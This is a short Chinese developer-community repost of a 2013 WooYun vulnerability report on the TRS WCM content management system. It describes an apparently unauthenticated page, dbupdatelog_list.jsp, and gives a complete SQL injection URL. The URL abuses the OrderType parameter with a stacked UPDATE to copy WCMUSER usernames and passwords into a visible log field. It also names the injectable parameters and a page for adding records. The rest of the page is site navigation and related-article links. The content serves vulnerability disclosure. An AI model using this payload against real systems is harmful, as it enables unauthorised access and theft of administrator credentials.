AI 助理
文档备案控制台
开发者社区 数据库 文章 正文

TRS WCM SQL injection

2013-04-23 999
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 来源http://www.wooyun.org/bugs/wooyun-2013-019753首先是这个页面,好像是越权了http://xxxx/portal/db/dbupdatelog_list.

来源http://www.wooyun.org/bugs/wooyun-2013-019753

首先是这个页面,好像是越权了
http://xxxx/portal/db/dbupdatelog_list.jsp
正常应该要登陆才能看吧?
直接注入
http://xx/portal/db/dbupdatelog_list.jsp?trandom=0.507869236874006&PageIndex=1&OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG

注:存在注入参数为:OrderType 和 OrderField
即把查询记录显示在结果里,要是没有记录,可以自己加一条
http://xxxxx/portal/db/dbupdatelog_addedit.jsp

另,源码在这里存在:
http://iommp.googlecode.com/svn-history/r68/trunk/portal/WebRoot/db/dbupdatelog_list.jsp

文章标签:
SQL
关键词:
SQL Injection
cnbird
目录
相关文章
No8g攻城狮
|
SQL Java 数据库连接
sql injection violation, syntax error: syntax error, error in :‘**‘expect IDENTIFIER, actual IDENTIF
sql injection violation, syntax error: syntax error, error in :‘**‘expect IDENTIFIER, actual IDENTIF
No8g攻城狮
572 0
warmhearted
|
SQL 安全 网络安全
SQL注入(SQL Injection)
【8月更文挑战第11天】
warmhearted
854 3
香甜可口草莓蛋糕
|
SQL 安全 网络安全
DVWA SQL Injection (Blind) 通关解析
DVWA SQL Injection (Blind) 通关解析
香甜可口草莓蛋糕
1268 4
香甜可口草莓蛋糕
|
SQL Oracle Java
SQL 注入神器:jSQL Injection 保姆级教程
SQL 注入神器:jSQL Injection 保姆级教程
香甜可口草莓蛋糕
1247 4
程序员大阳
|
SQL
java.sql.SQLException: sql injection violation
本文目录 1. 报错信息 2. 问题分析 3. 排除法 4. 解决方案
程序员大阳
4354 0
游客ebi4wp2ql3fxg
|
SQL 安全 数据库
[dvwa] sql injection
[dvwa] sql injection
游客ebi4wp2ql3fxg
228 0
游客ebi4wp2ql3fxg
|
SQL 安全 数据库
[dvwa] sql injection(Blind)
[dvwa] sql injection(Blind)
游客ebi4wp2ql3fxg
190 0
士别三日wyx
|
SQL 安全 关系型数据库
DVWA-SQL注入(SQL Injection)低/中/高级别
DVWA是一个用来联系渗透的靶场,其中包含数个漏洞模块,本篇博客向大家简单介绍下SQL注入(SQL Injection)模块三个级别(low/medium/high)的通关步骤
士别三日wyx
2584 2
DVWA-SQL注入(SQL Injection)低/中/高级别
geeksongs
|
SQL 安全 Linux
kali linux 网络渗透测试学习笔记(二)OWASP ZAP工具扫描SQL injection漏洞失败
按照惯例,利用OWASP ZAP工具扫描SQL injection漏洞时,应该很快就可以扫描出来,但是在笔者进行扫描的时候,却遇到了以下状况: 这说明了该工具根本就没能够扫描出SQL注入的漏洞,不知道该如何解决。
geeksongs
2590 0
技术小甜
|
SQL 关系型数据库 Java
JSP SQL injectionの小技
技术小甜
1354 0

热门文章

最新文章

  • 1
    sql server的用户名和密码怎么查
  • 2
    阿里云 Serverless App Engine(SAE)助力升学在线从容应对流量高峰
  • 3
    百度网址安全中心怎么取消拦截的详细解决办法
  • 4
    一文带你认识医院信息化必备系统HIS、CIS、LIS、EMR、PACS、RIS等
  • 5
    【最佳实践】实时计算 Flink 版在金融行业的实时数仓建设实践
  • 6
    欢迎加入Spark中国社区
  • 7
    阿里云个人版,企业版免费用,满足这些条件就可以申请,你满足吗
  • 8
    30 条 SQL 语句性能优化策略,建议收藏!
  • 9
    一个博友的SQL问题解决过程
  • 10
    SQL解析器之词法分析--预扫描
  • 1
    SQL语言小结
    420
  • 2
    (SQL)SQL语言中的查询语句整理
    415
  • 3
    为什么这些 SQL 语句逻辑相同,性能却差异巨大?
    330
  • 4
    SQL日志优化策略:提升数据库日志记录效率
    397
  • 5
    阿里云数据库RDS费用价格:MySQL、SQL Server、PostgreSQL和MariaDB引擎收费标准
    1421
  • 6
    阿里云数据库收费价格:MySQL、PostgreSQL、SQL Server和MariaDB引擎费用整理
    1489
  • 7
    SQL Server 2025 RC1 发布 - 从本地到云端的 AI 就绪企业数据库
    709
  • 8
    MCP与PolarDB集成技术分析:降低SQL门槛与简化数据可视化流程的机制解析
    702
  • 9
    阿里云数据库RDS支持MySQL、SQL Server、PostgreSQL和MariaDB引擎
    1027
  • 10
    生成更智能,调试更轻松,SLS SQL Copilot 焕新登场!
    733

    • 相关课程

    更多
  • 如何在 PolarDB-X 中优化慢 SQL
  • SQL完全自学手册
  • SQL Server on Linux入门教程
  • SQL入门与实践
  • 数据库及SQL/MySQL基础
  • SQL进阶及查询

    • 相关电子书

    更多
  • SQL Server 2017
  • GeoMesa on Spark SQL
  • 原生SQL on Hadoop引擎- Apache HAWQ 2.x最新技术解密malili
    • 下一篇
    阿里云正式发布 Agentic 代码安全:AI驱动的双Agent协同引擎